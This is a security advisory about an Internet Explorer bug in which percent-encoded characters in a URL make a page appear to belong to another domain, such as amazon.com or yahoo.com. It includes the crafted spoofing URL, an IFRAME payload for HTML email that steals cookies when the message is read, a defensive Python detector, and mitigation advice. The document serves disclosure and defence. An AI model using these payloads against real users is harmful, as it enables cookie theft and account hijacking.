COMMAND

    IE

SYSTEMS AFFECTED

    IE

PROBLEM

    IE can be fooled into thinking a web page is in any domain by
    encoding some characters in the URL and placing the domain you
    want to spoof at the end of the URL.  For example, the URL

        http://www.peacefire.org%2fsecurity%2fiecookies%2fshowcookie.html%3F.amazon.com

    is in the peacefire.org domain, but because "/" and "?" are
    replaced by "%2f" and "%3f", IE will think the URL is in the
    amazon.com domain.
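    As an added illustration (not part of the original advisory), the
    following Python script shows why the encoded URL fools a check that
    trusts the undecoded host string, and gives a defender a quick test
    for such URLs.  The naive_domain() function is a model of the
    behaviour the advisory describes, not IE's actual code; the sample
    URLs are the advisory's own plus one benign one.

```python
from urllib.parse import urlsplit, unquote

# Characters that end the authority (host) part of a URL.  Percent-encoded
# copies of them inside the host portion are the signature of the trick the
# advisory describes: "%2f" and "%3f" hide the real path so a naive parser
# reads the spoofed domain at the end of the string as the host.
AUTHORITY_DELIMITERS = set("/?#\\")


def raw_host(url: str) -> str:
    """Host portion exactly as written, before any percent-decoding."""
    netloc = urlsplit(url).netloc
    return netloc.rsplit("@", 1)[-1].split(":", 1)[0].lower()


def naive_domain(url: str) -> str:
    """Model (an assumption, not IE's code) of a parser that trusts the
    undecoded host string and takes its last two labels as the domain."""
    return ".".join(raw_host(url).split(".")[-2:])


def effective_host(url: str) -> str:
    """Where a client that decodes before parsing actually sends the request."""
    return raw_host(unquote(url))


def is_domain_spoofing(url: str) -> bool:
    """True when decoding the host portion reveals an authority delimiter,
    i.e. the written host and the real host cannot be the same."""
    decoded = unquote(urlsplit(url).netloc)
    return bool(AUTHORITY_DELIMITERS & set(decoded))


# Constructed samples: the advisory's URL, its IFRAME variant, and a benign one.
SAMPLES = [
    "http://www.peacefire.org%2fsecurity%2fiecookies%2fshowcookie.html%3F.amazon.com",
    "http://www.peacefire.org%2fsecurity%2fiecookies%2fshowcookie.html%3f.yahoo.com/",
    "http://www.peacefire.org/security/iecookies/",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(f"{url}\n  naive domain: {naive_domain(url)}"
              f"\n  real host:    {effective_host(url)}"
              f"\n  spoofing:     {is_domain_spoofing(url)}")
```

    The first two samples report "amazon.com" and "yahoo.com" from the
    naive check while the request really goes to www.peacefire.org.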

    You can find more information at

        http://www.peacefire.org/security/iecookies/

    Although the web page only mentions cookies, it may be possible to
    exploit the problem in other ways, as the security settings for
    domains may be different.  For example, a user may allow the
    execution of unsigned ActiveX controls from their company's domain.

    This same IE bug can also be exploited from an HTML Email  message
    in Outlook and Outlook Express.  The trick is to put the magic URL
    in an HTML IFRAME tag.  Example:

        <iframe src="http://www.peacefire.org%2fsecurity%2fiecookies%2fshowcookie.html%3f.yahoo.com/">
        </iframe>

    A malicious Email message could include many IFRAMEs to grab
    cookies from different domains.  The cookies are stolen when the
    message is read.  Using an Email message, an attack can be
    directed at a particular person or a group of people without them
    ever going to a Web site.  The exploit could also be included in
    a spam Email message or in the payload of an Email worm/virus.

SOLUTION

    That is why you are supposed to configure Outlook to use a
    restricted security zone for reading mail that doesn't allow any
    "active scripting languages", etc.  Actually, the Restricted Sites
    Zone still has Active Scripting turned on.  This zone only
    disables ActiveX controls and Java applets by default.  To make
    Outlook and Outlook Express safe from IE security holes requires
    Active Scripting to be turned off manually.  Richard put
    instructions on his Web site last summer that go through the
    entire procedure:

        http://www.tiac.net/users/smiths/acctroj/oe.htm

    It doesn't make using Outlook safe, but it protects against
    simplistic things like this.  This whole thing was gone through a
    few months ago with the "cross site scripting" issue.  The issues
    are the same.  There are lots of ways to do this if you don't
    have the zone you use for reading mail locked down; you can just
    use JavaScript in the message itself if you want.

    This hole exposes very little that wasn't already exposed.  Do not
    rate the seriousness of problems based on the media attention
    they get.  Why?  Well, for example, take a look at the sites
    listed in "implications" at

        http://peacefire.org/security/iecookies/